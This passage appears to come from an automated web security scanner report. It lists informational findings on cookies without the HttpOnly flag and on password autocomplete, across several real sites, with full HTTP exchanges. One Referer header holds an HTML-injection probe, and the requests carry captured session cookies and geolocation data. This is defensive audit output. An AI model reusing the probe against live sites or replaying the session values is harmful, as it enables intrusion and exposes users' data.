fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A4.6%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A2%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%2C%22f%22%3A1313432588654%7D; __utmc=241758596; fsr.a=1313432596285

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10656
Expires: Mon, 15 Aug 2011 18:22:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:22:23 GMT
Connection: close
Set-Cookie: TLTHID=85646AA0C76B10C7BC67BA17888D1881; Path=/; Domain=.att.com


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<
...[SNIP]...

8.104. http://www.wireless.att.com/cell-phone-service/packages/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/N

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cell-phone-service/packages/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Cnection: close
Location: http://www.att.com/homepage/sitemap/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 18:20:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTHID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: TLTSID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: TLTUID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:20:19 GMT
Set-Cookie: B2CSESSIONID=hFZCTJjDHKQ8yx!587287761; path=/; HttpOnly
Set-Cookie: BIGipServerpWL_7010_7011=466735495.25115.0000; path=/
Content-Length: 2



8.105. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...

8.106. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/netbook-packages.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/netbook-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.4.10.1313431966; TLTHID=9C4648E2C76B10C7B846FFAD8CC90BB7; TLTSID=9C4648E2C76B10C7B846FFAD8CC90BB7; BIGipServerpWL_7010_7011=2060571015.25115.0000; fsr.a=1313432642829; wtAka=y

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 91395
Expires: Mon, 15 Aug 2011 18:23:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:23:08 GMT
Connection: close
Set-Cookie: TLTHID=A01F50D0C76B10C7BEB5A17F0D25FB73; Path=/; Domain=.att.com


                                                                           
...[SNIP]...

8.107. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103697
Expires: Mon, 15 Aug 2011 18:20:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:32 GMT
Connection: close
Set-Cookie: TLTHID=43172EBCC76B10C7CFD7C47F0B9E96D6; Path=/; Domain=.att.com


                                                                       
...[SNIP]...

8.108. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 09 Aug 2011 22:05:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 6614
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: TLTHID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTSID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTUID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:20 GMT
Set-Cookie: BIGipServerpWL_7010_7011=248631687.25115.0000; path=/

GIF89a_...................................l..............=;;pw.ECB...............JKL-+)QRT...............R]/.....422,.....%#"=Js\\].........cbd...zzy.........srr...............lji......X......
   ...`
...[SNIP]...

8.109. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/globemaintenance.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store_maintenance/images/globemaintenance.gif?01RI=0F8495D0A0133CD&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D56B56C76B10C79A33B13681FBD5E5; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...

8.110. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/page_btmSlice.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store_maintenance/images/page_btmSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com
Set-Cookie: TLTSID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com
Set-Cookie: TLTUID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=TDvJTJjGvPQVz4!1142544054; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148005471; path=/
Set-Cookie: DYN_USER_CONFIRM=0bc1e36676ae0e394fe208fe63bb9e95; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701433188; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=3989950855.25115.0000; path=/


                                                                                   
...[SNIP]...

8.111. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/page_midSlice.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D5C484C76B10C7C0C896712A89A4E2; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...

8.112. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...

8.113. http://wzus1.ask.com/i/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&ld=1068&sv=0a5c407c&p=news&ord=2733532&cu.wz=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: wzus1.ask.com

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:28:06 GMT
Set-Cookie: wz_uid=0241E846986E52306D32291A797EB06A; path=/; expires=Wed, 14-Aug-2013 18:28:06 GMT; domain=.ask.com
Set-Cookie: wz_sid=0B44E444986E52306D32291A797EB06A; path=/; expires=Mon, 15-Aug-2011 18:58:06 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Wed, 14-Aug-2013 18:28:06 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=bntps&app=a14&l=dir&o=0&ld=1068&sv=0a5c407c&p=news&ord=2733532&cu.wz=0&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&cu.wz=0&cu=0&cs=0&__utma=0&__utmb=0&__utmc=0&__utmz=0&__utmv=0&__utmx=0&
Content-Length: 564
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/i.gif?t=S&amp;d=us&amp;s
...[SNIP]...

9. Password field with autocomplete enabled  previous  next
There are 21 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


9.1. http://pop6.com/p/memsearch.cgi  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

